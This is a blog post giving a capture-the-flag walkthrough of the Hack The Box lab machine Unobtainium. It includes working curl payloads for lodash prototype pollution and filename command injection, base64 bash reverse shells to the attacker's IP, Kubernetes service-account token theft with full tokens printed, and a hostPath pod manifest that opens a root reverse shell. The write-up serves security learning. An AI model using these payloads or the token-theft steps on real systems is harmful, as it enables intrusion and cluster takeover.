Unobtainium

Posted on Sep 6, 2021

HTB - Unobtainium


NMAP

We begin with an nmap scan.

All ports

Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-14 06:46 EDT
Nmap scan report for 10.10.10.235
Host is up (5.6s latency).
Not shown: 49841 filtered ports, 15691 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
2380/tcp open  etcd-server

Nmap done: 1 IP address (1 host up) scanned in 51.27 seconds

Open ports

Nmap scan report for 10.10.10.235
Host is up (0.085s latency).

PORT     STATE SERVICE          VERSION
22/tcp   open  ssh              OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e4:bf:68:42:e5:74:4b:06:58:78:bd:ed:1e:6a:df:66 (RSA)
|   256 bd:88:a1:d9:19:a0:12:35:ca:d3:fa:63:76:48:dc:65 (ECDSA)
|_  256 cf:c4:19:25:19:fa:6e:2e:b7:a4:aa:7d:c3:f1:3d:9b (ED25519)
80/tcp   open  http             Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Unobtainium
2380/tcp open  ssl/etcd-server?
| ssl-cert: Subject: commonName=unobtainium
| Subject Alternative Name: DNS:localhost, DNS:unobtainium, IP Address:10.10.10.3, IP Address:127.0.0.1, IP Address:0:0:0:0:0:0:0:1
| Not valid before: 2021-01-17T07:10:30
|_Not valid after:  2022-01-17T07:10:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  h2
| tls-nextprotoneg: 
|_  h2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.72 seconds

From the website we download the .deb package and extract it to inspect its contents.
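A .deb is just an ar archive with control and data members; dpkg-deb can unpack both in one step (the package filename here is an assumption):

└─$ dpkg-deb -R unobtainium_1.0.0_amd64.deb extracted
└─$ cd extracted/DEBIAN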

└─$ cat control 
Package: unobtainium
Version: 1.0.0
License: ISC
Vendor: felamos <felamos@unobtainium.htb>
Architecture: amd64
Maintainer: felamos <felamos@unobtainium.htb>
Installed-Size: 185617
Depends: libgtk-3-0, libnotify4, libnss3, libxss1, libxtst6, xdg-utils, libatspi2.0-0, libuuid1, libappindicator3-1, libsecret-1-0
Section: default
Priority: extra
Homepage: http://unobtainium.htb
Description: 
  client

We install the package and run it.

Looks like some kind of chat application.

If we send a message and inspect the traffic in Wireshark, we get credentials in cleartext.
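One way to pull the plaintext straight out of a capture (a sketch; the interface name is an assumption):

└─$ sudo tshark -i tun0 -f 'host 10.10.10.235' -Y http -T fields -e http.file_data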

Next we look at the traffic generated when we press Todo and see a request carrying a filename parameter.

If we change the filename to index.js, we obtain the contents of that file; the request is easy to replay outside the client, as shown below.
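A curl equivalent of what the client sends (reconstructed from the capture; the credentials and port are the ones sniffed above):

└─$ curl --request POST --url http://unobtainium:31337/todo \
  --header 'content-type: application/json' \
  --data '{"auth": {"name": "felamos", "password": "Winter2021"}, "filename": "index.js"}'

Cleaning up the source code that comes back: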

{"ok":true,"content":"var root = require("google-cloudstorage-commands");
const express = require('express');
const { exec } = require("child_process");     
const bodyParser = require('body-parser');     
const _ = require('lodash');                                                                  
const app = express();
var fs = require('fs');
                                                                                              
const users = [                                                                               
  {name: 'felamos', password: 'Winter2021'},
  {name: 'admin', password: Math.random().toString(32), canDelete: true, canUpload: true},      
];

let messages = [];                             
let lastId = 1;                                
                                                                                              
function findUser(auth) {                                                                     
  return users.find((u) =>                                                                    
    u.name === auth.name &&                                                                   
    u.password === auth.password);                                                            
}                                    
                                               
app.use(bodyParser.json());                                                                   
                                               
app.get('/', (req, res) => {                   
  res.send(messages);                                                                         
});                                                                                           
                                                                                              
app.put('/', (req, res) => {   
  const user = findUser(req.body.auth || {});                                                 
                                               
  if (!user) {                                 
    res.status(403).send({ok: false, error: 'Access denied'});                                
    return;
  }

  const message = {
    icon: '__',
  };

  _.merge(message, req.body.message, {
    id: lastId++,
    timestamp: Date.now(),
    userName: user.name,
  });

  messages.push(message);
  res.send({ok: true});
});

app.delete('/', (req, res) => {
  const user = findUser(req.body.auth || {});

  if (!user || !user.canDelete) {
    res.status(403).send({ok: false, error: 'Access denied'});
    return;
  }

  messages = messages.filter((m) => m.id !== req.body.messageId);
  res.send({ok: true});
});
app.post('/upload', (req, res) => {
  const user = findUser(req.body.auth || {});
  if (!user || !user.canUpload) {
    res.status(403).send({ok: false, error: 'Access denied'});
    return;
  }


  filename = req.body.filename;
  root.upload("./",filename, true);
  res.send({ok: true, Uploaded_File: filename});
});

app.post('/todo', (req, res) => {
tconst user = findUser(req.body.auth || {});
tif (!user) {
ttres.status(403).send({ok: false, error: 'Access denied'});
ttreturn;
t}

tfilename = req.body.filename;
        testFolder = "/usr/src/app";
        fs.readdirSync(testFolder).forEach(file => {
                if (file.indexOf(filename) > -1) {
                        var buffer = fs.readFileSync(filename).toString();
                        res.send({ok: true, content: buffer});
                }
        });
});

app.listen(3000);
console.log('Listening on port 3000...');
"}        

It turns out that the application is vulnerable to JSON prototype pollution: the PUT handler merges the user-controlled message object into a fresh object with _.merge.

The source code of the application appears to be forked from this repo.

Prototype Pollution in JavaScript

Prototype Pollution is a vulnerability affecting JavaScript. It refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, the prototype of the base object by injecting other values. Properties on Object.prototype are then inherited by all JavaScript objects through the prototype chain. This leads either to denial of service by triggering JavaScript exceptions, or to tampering with the application logic to force the code path the attacker injects, thereby leading to remote code execution.

source
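Here the gadget is that unguarded _.merge(message, req.body.message, ...) call. A minimal local sketch of the primitive (assuming an old lodash release vulnerable to __proto__ merging, roughly pre-4.17.5; current versions ignore the key):

node -e '
const _ = require("lodash");
const message = { icon: "__" };
// JSON.parse yields an object with an own "__proto__" key, which a
// vulnerable _.merge walks into and copies onto Object.prototype
_.merge(message, JSON.parse(`{"text": "bad", "__proto__": {"canUpload": true}}`));
console.log({}.canUpload);   // true -- every object now inherits canUpload
'

Because the felamos user object has no canUpload property of its own, a polluted Object.prototype makes user.canUpload truthy and the upload check passes.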

So we use the method explained in the repo to give our user the ability to upload files:

┌──(bob㉿kali)-[~/htb/Unobtainium]
└─$ curl --request PUT \
  --url http://unobtainium:31337 \
  --header 'content-type: application/json' \
  --data '{"auth": {"name": "felamos", "password": "Winter2021"}, "message": { "text": "bad", "__proto__": {"canUpload": true}}}'

{"ok":true}

A more detailed explanation of the vulnerability can be found here

We can get command execution by injecting shell commands into the filename field: {"filename": "dfd; command"}. The /upload handler hands the filename to google-cloudstorage-commands, which passes it to a shell unsanitized. After playing with some different payload variations, we finally get a shell with
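The payload is just a base64-encoded bash reverse shell pointing at our tun0 address:

└─$ echo -n 'bash -i >& /dev/tcp/10.10.16.65/9001 0>&1' | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi42NS85MDAxIDA+JjE=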

┌──(bob㉿kali)-[~/htb/Unobtainium]
└─$ curl --request POST \                                                                
  --url http://unobtainium:31337/upload \
  --header 'content-type: application/json' \
  --data '{"auth":{"name":"felamos","password":"Winter2021"},"filename":"ff333333; echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi42NS85MDAxIDA+JjE= | base64 -d | bash"}'
{"ok":true,"Uploaded_File":"ff333333; echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi42NS85MDAxIDA+JjE= | base64 -d | bash"}'
                                        

┌──(bob㉿kali)-[~/htb/Unobtainium]
└─$ rlwrap nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.10.16.65] from (UNKNOWN) [10.10.10.235] 44840
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@webapp-deployment-5d764566f4-mbprj:/usr/src/app# 
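The shell has no job control; if python3 happens to exist in the container, we can upgrade to a proper TTY with the usual trick:

python3 -c 'import pty; pty.spawn("/bin/bash")'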

The user flag is located in $HOME:

drwxr-xr-x 2 root root 4096 Apr 14 13:36 .
drwxr-xr-x 1 root root 4096 Apr 14 10:36 ..
-rw------- 1 root root 2376 Apr 14 22:30 .bash_history
-rw-r--r-- 2 root root   33 Apr 14 10:35 user.txt
root@webapp-deployment-5d764566f4-lrpt9:~# 

Privilege Escalation

Enumerating Kubernetes

From /etc/hosts we learn that we are likely in a Kubernetes pod.
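A few quick checks back this up (the service account path is the standard Kubernetes mount):

cat /etc/hosts
env | grep -i kubernetes
ls /run/secrets/kubernetes.io/serviceaccount/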

To work with Kubernetes we need kubectl, but it is not on the box:


root@webapp-deployment-5d764566f4-lrpt9:/usr/src/app# find / -name kubectl 2>/dev/null

The search comes up empty, so we download a kubectl binary to the pod and make it executable.
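One way to stage it (the kubectl version and the staging port are assumptions):

On our box:

└─$ curl -LO https://dl.k8s.io/release/v1.20.0/bin/linux/amd64/kubectl
└─$ python3 -m http.server 8000

On the pod:

cd /tmp
wget http://10.10.16.65:8000/kubectl
chmod +x kubectl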

We get the namespaces by running ./kubectl get namespace:

NAME              STATUS   AGE
default           Active   89d
dev               Active   88d
kube-node-lease   Active   89d
kube-public       Active   89d
kube-system       Active   89d

When we try to list pods in each namespace, we find that we only have permissions in dev; ./kubectl get pods -n dev returns the pods, while every other namespace is forbidden.

NAME                                READY   STATUS    RESTARTS   AGE
devnode-deployment-cd86fb5c-6ms8d   1/1     Running   28         88d
devnode-deployment-cd86fb5c-mvrfz   1/1     Running   29         88d
devnode-deployment-cd86fb5c-qlxww   1/1     Running   29         88d
./kubectl get pods -n default
Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:default:default" cannot list resource "pods" in API group "" in the namespace "default"
./kubectl get pods -n kube-node-lease
Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:default:default" cannot list resource "pods" in API group "" in the namespace "kube-node-lease"
./kubectl get pods -n kube-public
Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:default:default" cannot list resource "pods" in API group "" in the namespace "kube-public"
./kubectl get pods -n kube-system
Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:default:default" cannot list resource "pods" in API group "" in the namespace "kube-system"
root@webapp-deployment-5d764566f4-lrpt9:/tmp# 

We describe each pod in dev.

./kubectl describe pod devnode-deployment-cd86fb5c-6ms8d -n dev

Name:         devnode-deployment-cd86fb5c-6ms8d
Namespace:    dev
Priority:     0
Node:         unobtainium/10.10.10.235
Start Time:   Sun, 17 Jan 2021 18:16:21 +0000
Labels:       app=devnode
             pod-template-hash=cd86fb5c
Annotations:  <none>
Status:       Running
IP:           172.17.0.6
IPs:
 IP:           172.17.0.6
Controlled By:  ReplicaSet/devnode-deployment-cd86fb5c
Containers:
 devnode:
   Container ID:   docker://d91f29af3545c32e260a370561834726b8372fb83f2c7d67da2d30be745f4443
   Image:          localhost:5000/node_server
   Image ID:       docker-pullable://localhost:5000/node_server@sha256:f3bfd2fc13c7377a380e018279c6e9b647082ca590600672ff787e1bb918e37c
   Port:           3000/TCP
   Host Port:      0/TCP
   State:          Running
     Started:      Wed, 14 Apr 2021 10:36:17 +0000
   Last State:     Terminated
     Reason:       Error
     Exit Code:    137
     Started:      Wed, 24 Mar 2021 16:01:28 +0000
     Finished:     Wed, 24 Mar 2021 16:02:13 +0000
   Ready:          True
   Restart Count:  28
   Environment:    <none>
   Mounts:
     /var/run/secrets/kubernetes.io/serviceaccount from default-token-rmcd6 (ro)
Conditions:
 Type              Status
 Initialized       True 
 Ready             True 
 ContainersReady   True 
 PodScheduled      True 
Volumes:
 default-token-rmcd6:
   Type:        Secret (a volume populated by a Secret)
   SecretName:  default-token-rmcd6
   Optional:    false
QoS Class:       BestEffort
Node-Selectors:  <none>
Tolerations:     node.kubernetes.io/not-ready:NoExecute op=Exists for 300s
                node.kubernetes.io/unreachable:NoExecute op=Exists for 300s
Events:          <none>

./kubectl describe pod devnode-deployment-cd86fb5c-mvrfz -n dev
Name:         devnode-deployment-cd86fb5c-mvrfz
Namespace:    dev
Priority:     0
Node:         unobtainium/10.10.10.235
Start Time:   Sun, 17 Jan 2021 18:16:21 +0000
Labels:       app=devnode
              pod-template-hash=cd86fb5c
Annotations:  <none>
Status:       Running
IP:           172.17.0.4
IPs:
  IP:           172.17.0.4
Controlled By:  ReplicaSet/devnode-deployment-cd86fb5c
Containers:
  devnode:
    Container ID:   docker://36fafdfa5e52aadc4ed43ea229c5b31eaf6ee809b6d905506465151079b966e7
    Image:          localhost:5000/node_server
    Image ID:       docker-pullable://localhost:5000/node_server@sha256:f3bfd2fc13c7377a380e018279c6e9b647082ca590600672ff787e1bb918e37c
    Port:           3000/TCP
    Host Port:      0/TCP
    State:          Running
      Started:      Wed, 14 Apr 2021 10:36:17 +0000
    Last State:     Terminated
      Reason:       Error
      Exit Code:    137
      Started:      Wed, 24 Mar 2021 16:01:31 +0000
      Finished:     Wed, 24 Mar 2021 16:02:12 +0000
    Ready:          True
    Restart Count:  29
    Environment:    <none>
    Mounts:
      /var/run/secrets/kubernetes.io/serviceaccount from default-token-rmcd6 (ro)
Conditions:
  Type              Status
  Initialized       True 
  Ready             True 
  ContainersReady   True 
  PodScheduled      True 
Volumes:
  default-token-rmcd6:
    Type:        Secret (a volume populated by a Secret)
    SecretName:  default-token-rmcd6
    Optional:    false
QoS Class:       BestEffort
Node-Selectors:  <none>
Tolerations:     node.kubernetes.io/not-ready:NoExecute op=Exists for 300s
                 node.kubernetes.io/unreachable:NoExecute op=Exists for 300s
Events:          <none>

./kubectl describe pod devnode-deployment-cd86fb5c-qlxww -n dev
Name:         devnode-deployment-cd86fb5c-qlxww
Namespace:    dev
Priority:     0
Node:         unobtainium/10.10.10.235
Start Time:   Sun, 17 Jan 2021 18:16:21 +0000
Labels:       app=devnode
             pod-template-hash=cd86fb5c
Annotations:  <none>
Status:       Running
IP:           172.17.0.5
IPs:
 IP:           172.17.0.5
Controlled By:  ReplicaSet/devnode-deployment-cd86fb5c
Containers:
 devnode:
   Container ID:   docker://3425fcb18cf327bba0a6468e570602cd6eb1058235f0fdb1e538d70d7421a844
   Image:          localhost:5000/node_server
   Image ID:       docker-pullable://localhost:5000/node_server@sha256:f3bfd2fc13c7377a380e018279c6e9b647082ca590600672ff787e1bb918e37c
   Port:           3000/TCP
   Host Port:      0/TCP
   State:          Running
     Started:      Wed, 14 Apr 2021 10:36:17 +0000
   Last State:     Terminated
     Reason:       Error
     Exit Code:    137
     Started:      Wed, 24 Mar 2021 16:01:33 +0000
     Finished:     Wed, 24 Mar 2021 16:02:12 +0000
   Ready:          True
   Restart Count:  29
   Environment:    <none>
   Mounts:
     /var/run/secrets/kubernetes.io/serviceaccount from default-token-rmcd6 (ro)
Conditions:
 Type              Status
 Initialized       True 
 Ready             True 
 ContainersReady   True 
 PodScheduled      True 
Volumes:
 default-token-rmcd6:
   Type:        Secret (a volume populated by a Secret)
   SecretName:  default-token-rmcd6
   Optional:    false
QoS Class:       BestEffort
Node-Selectors:  <none>
Tolerations:     node.kubernetes.io/not-ready:NoExecute op=Exists for 300s
                node.kubernetes.io/unreachable:NoExecute op=Exists for 300s
Events:          <none>

Getting a Service Account Token

From enumerating the different pods, it looks like each one is running the same web app we already exploited (this is common for load balancing purposes).

We use the same two-step exploit (prototype pollution, then command injection) to get a reverse shell on one of the dev pods; 172.17.0.4, 172.17.0.5 and 172.17.0.6 all run the same code, and here we target 172.17.0.6:
curl --request PUT --url http://172.17.0.6:3000 \
  --header 'content-type: application/json' \
  --data '{"auth": {"name": "felamos", "password": "Winter2021"}, "message": { "text": "bad", "__proto__": {"canUpload": true}}}'
  
curl --request POST --url http://172.17.0.6:3000/upload \
  --header 'content-type: application/json' \
  --data '{"auth":{"name":"felamos","password":"Winter2021"},"filename":"ff3333; echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi42NS85MDAxIDA+JjE= | base64 -d | bash"}'

From here we want the pod's service account token. We catch the shell with the same listener setup we used to get user on port 3000, then read the token from the standard mount:

cat /run/secrets/kubernetes.io/serviceaccount/token

eyJhbGciOiJSUzI1NiIsImtpZCI6IkpOdm9iX1ZETEJ2QlZFaVpCeHB6TjBvaWNEalltaE1ULXdCNWYtb2JWUzgifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJkZXYiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlY3JldC5uYW1lIjoiZGVmYXVsdC10b2tlbi1ybWNkNiIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50Lm5hbWUiOiJkZWZhdWx0Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQudWlkIjoiMzQxZTdlNjYtNGIwZC00YTZlLWIzODgtOWE2ODQwNTVmOWRmIiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRldjpkZWZhdWx0In0.NdoMnigZmgPQR98lNmLdrF8iG_4yJMEVnyM0UHoZ4B2lh_Dve524sohFRhoBM3hxN2He7l0P3U2lSZXZO272tlmj48lly-_fGRfQ4xcXIbH7lvmiq2qHKcP4MJGql5X4NH4ereZvwkTvSyduRmEcw31qmn1Gres2eQxf4_2WBsC_4CAyMQPMktS1O6p54c_0BaX76ZGJjXKHsOXhrBZ1jzTcX8OGdlfss2eaMv1DtYkzqoK7Ug5Ru7LpUNsqfooWNdekYFCBj6OZxIwIgPbz0pgIPgByJAm6gUBnpaya4vnUzkIPBsek7rr5fz6OKxeggOo5ZjbLOyQSuVFpn43TIw

Back on the first pod, we use the stolen dev token to check our permissions in each namespace, and discover that we can get secrets from kube-system.

./kubectl -n kube-system --token eyJhbGciOiJSUzI1NiIsImtpZCI6IkpOdm9iX1ZETEJ2QlZFaVpCeHB6TjBvaWNEalltaE1ULXdCNWYtb2JWUzgifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJkZXYiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlY3JldC5uYW1lIjoiZGVmYXVsdC10b2tlbi1ybWNkNiIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50Lm5hbWUiOiJkZWZhdWx0Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQudWlkIjoiMzQxZTdlNjYtNGIwZC00YTZlLWIzODgtOWE2ODQwNTVmOWRmIiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRldjpkZWZhdWx0In0.NdoMnigZmgPQR98lNmLdrF8iG_4yJMEVnyM0UHoZ4B2lh_Dve524sohFRhoBM3hxN2He7l0P3U2lSZXZO272tlmj48lly-_fGRfQ4xcXIbH7lvmiq2qHKcP4MJGql5X4NH4ereZvwkTvSyduRmEcw31qmn1Gres2eQxf4_2WBsC_4CAyMQPMktS1O6p54c_0BaX76ZGJjXKHsOXhrBZ1jzTcX8OGdlfss2eaMv1DtYkzqoK7Ug5Ru7LpUNsqfooWNdekYFCBj6OZxIwIgPbz0pgIPgByJAm6gUBnpaya4vnUzkIPBsek7rr5fz6OKxeggOo5ZjbLOyQSuVFpn43TIw auth can-i --list
Resources                                       Non-Resource URLs                     Resource Names   Verbs
selfsubjectaccessreviews.authorization.k8s.io   []                                    []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                                    []               [create]
secrets                                         []                                    []               [get list]
                                                [/.well-known/openid-configuration]   []               [get]
                                                [/api/*]                              []               [get]
                                                [/api]                                []               [get]
                                                [/apis/*]                             []               [get]
                                                [/apis]                               []               [get]
                                                [/healthz]                            []               [get]
                                                [/healthz]                            []               [get]
                                                [/livez]                              []               [get]
                                                [/livez]                              []               [get]
                                                [/openapi/*]                          []               [get]
                                                [/openapi]                            []               [get]
                                                [/openid/v1/jwks]                     []               [get]
                                                [/readyz]                             []               [get]
                                                [/readyz]                             []               [get]
                                                [/version/]                           []               [get]
                                                [/version/]                           []               [get]
                                                [/version]                            []               [get]
                                                [/version]                            []               [get]

Now we list the secrets:

./kubectl --token eyJhbGciOiJSUzI1NiIsImtpZCI6IkpOdm9iX1ZETEJ2QlZFaVpCeHB6TjBvaWNEalltaE1ULXdCNWYtb2JWUzgifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJkZXYiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlY3JldC5uYW1lIjoiZGVmYXVsdC10b2tlbi1ybWNkNiIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50Lm5hbWUiOiJkZWZhdWx0Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQudWlkIjoiMzQxZTdlNjYtNGIwZC00YTZlLWIzODgtOWE2ODQwNTVmOWRmIiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRldjpkZWZhdWx0In0.NdoMnigZmgPQR98lNmLdrF8iG_4yJMEVnyM0UHoZ4B2lh_Dve524sohFRhoBM3hxN2He7l0P3U2lSZXZO272tlmj48lly-_fGRfQ4xcXIbH7lvmiq2qHKcP4MJGql5X4NH4ereZvwkTvSyduRmEcw31qmn1Gres2eQxf4_2WBsC_4CAyMQPMktS1O6p54c_0BaX76ZGJjXKHsOXhrBZ1jzTcX8OGdlfss2eaMv1DtYkzqoK7Ug5Ru7LpUNsqfooWNdekYFCBj6OZxIwIgPbz0pgIPgByJAm6gUBnpaya4vnUzkIPBsek7rr5fz6OKxeggOo5ZjbLOyQSuVFpn43TIw -n kube-system get secrets
NAME                                             TYPE                                  DATA   AGE
attachdetach-controller-token-5dkkr              kubernetes.io/service-account-token   3      89d
bootstrap-signer-token-xl4lg                     kubernetes.io/service-account-token   3      89d
c-admin-token-tfmp2                              kubernetes.io/service-account-token   3      88d
certificate-controller-token-thnxw               kubernetes.io/service-account-token   3      89d
clusterrole-aggregation-controller-token-scx4p   kubernetes.io/service-account-token   3      89d
coredns-token-dbp92                              kubernetes.io/service-account-token   3      89d
cronjob-controller-token-chrl7                   kubernetes.io/service-account-token   3      89d
daemon-set-controller-token-cb825                kubernetes.io/service-account-token   3      89d
default-token-l85f2                              kubernetes.io/service-account-token   3      89d
deployment-controller-token-cwgst                kubernetes.io/service-account-token   3      89d
disruption-controller-token-kpx2x                kubernetes.io/service-account-token   3      89d
endpoint-controller-token-2jzkv                  kubernetes.io/service-account-token   3      89d
endpointslice-controller-token-w4hwg             kubernetes.io/service-account-token   3      89d
endpointslicemirroring-controller-token-9qvzz    kubernetes.io/service-account-token   3      89d
expand-controller-token-sc9fw                    kubernetes.io/service-account-token   3      89d
generic-garbage-collector-token-2hng4            kubernetes.io/service-account-token   3      89d
horizontal-pod-autoscaler-token-6zhfs            kubernetes.io/service-account-token   3      89d
job-controller-token-h6kg8                       kubernetes.io/service-account-token   3      89d
kube-proxy-token-jc8kn                           kubernetes.io/service-account-token   3      89d
namespace-controller-token-2klzl                 kubernetes.io/service-account-token   3      89d
node-controller-token-k6p6v                      kubernetes.io/service-account-token   3      89d
persistent-volume-binder-token-fd292             kubernetes.io/service-account-token   3      89d
pod-garbage-collector-token-bjmrd                kubernetes.io/service-account-token   3      89d
pv-protection-controller-token-9669w             kubernetes.io/service-account-token   3      89d
pvc-protection-controller-token-w8m9r            kubernetes.io/service-account-token   3      89d
replicaset-controller-token-bzbt8                kubernetes.io/service-account-token   3      89d
replication-controller-token-jz8k8               kubernetes.io/service-account-token   3      89d
resourcequota-controller-token-wg7rr             kubernetes.io/service-account-token   3      89d
root-ca-cert-publisher-token-cnl86               kubernetes.io/service-account-token   3      89d
service-account-controller-token-44bfm           kubernetes.io/service-account-token   3      89d
service-controller-token-pzjnq                   kubernetes.io/service-account-token   3      89d
statefulset-controller-token-z2nsd               kubernetes.io/service-account-token   3      89d
storage-provisioner-token-tk5k5                  kubernetes.io/service-account-token   3      89d
token-cleaner-token-wjvf9                        kubernetes.io/service-account-token   3      89d
ttl-controller-token-z87px                       kubernetes.io/service-account-token   3      89d

We repeat ./kubectl -n <namespace> --token <token> auth can-i --list for each token of interest and fetch the secrets with ./kubectl --token <token> -n kube-system get secrets. We learn from this talk at RSA 2020 that daemon-set-controller-token-cb825 and replicaset-controller-token-bzbt8 have permission to create pods.

We get the daemon-set-controller token by running ./kubectl --token <token> -n kube-system describe secrets daemon-set-controller-token-cb825 and copying it:

[...]
Name:         daemon-set-controller-token-cb825
Namespace:    kube-system
Labels:       <none>
Annotations:  kubernetes.io/service-account.name: daemon-set-controller
             kubernetes.io/service-account.uid: 58a5014a-5be1-4144-8256-ebbe3b0d3eff

Type:  kubernetes.io/service-account-token

Data
====
token:      eyJhbGciOiJSUzI1NiIsImtpZCI6IkpOdm9iX1ZETEJ2QlZFaVpCeHB6TjBvaWNEalltaE1ULXdCNWYtb2JWUzgifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJkYWVtb24tc2V0LWNvbnRyb2xsZXItdG9rZW4tY2I4MjUiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoiZGFlbW9uLXNldC1jb250cm9sbGVyIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQudWlkIjoiNThhNTAxNGEtNWJlMS00MTQ0LTgyNTYtZWJiZTNiMGQzZWZmIiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50Omt1YmUtc3lzdGVtOmRhZW1vbi1zZXQtY29udHJvbGxlciJ9.Sube7Qn6hgQI_E9KRKOgSCzBnfbivCB_M_nUXAT-Hxh_i9ZLqGNeUlFzgnbHpGKMaKoyhM01rkMazQkndPq_RvfFBSq27ZKxPEVZW6lT0x3pN3m4aHbb0ZoYR6mM6ppR4u2aYgB6jpQcx7jkkyb-wzlLHHig6BIbpasJnAFc2SoadGEcSghASGwzqHMRbBVtltMc_IxEsZgxNciI4ehakPSc4VJQ1ah6K7xLuJDXJf8RYz9yVpwZXUeE6xhlNqDNzlXDaGXImP7QdTSI5IcCoe6hbjnoJHKIN1oijQ1sWQbuG6d0PxjeEEilKUtfuwcWCRSUP5Qx1LJ6-GG6TcwiFg
ca.crt:     1066 bytes
namespace:  11 bytes

We create a pod from the following YAML, which mounts the host's /root into the new pod (we get the image by running ./kubectl get pods --all-namespaces --token <daemon_set_controller_token>):

apiVersion: v1
kind: Pod
metadata:
  name: some-pod
  namespace: default
spec:
  containers:
    - name: web
      image: localhost:5000/dev-alpine
      command: ["/bin/sh"]
      args: ["-c", 'bash -i >& /dev/tcp/10.10.16.65/9001 0>&1']
      volumeMounts:
        - mountPath: /root/
          name: root-flag
  volumes:
    - hostPath:
        path: /root/
        type: ""
      name: root-flag

We save the YAML on our box and download it onto the victim. Then we create the pod by running ./kubectl create -f <yaml> --token <daemon_set_controller_token>; the pod is created and we get our root shell.
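Putting the final step together (the manifest filename and the staging port are assumptions; the listener is the same rlwrap nc -nvlp 9001 as before):

wget http://10.10.16.65:8000/pod.yaml
./kubectl create -f pod.yaml --token <daemon_set_controller_token>

When the pod starts, it runs our reverse shell as root with the host's /root mounted at /root/, so the root flag is a cat /root/root.txt away.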

#prototypepollution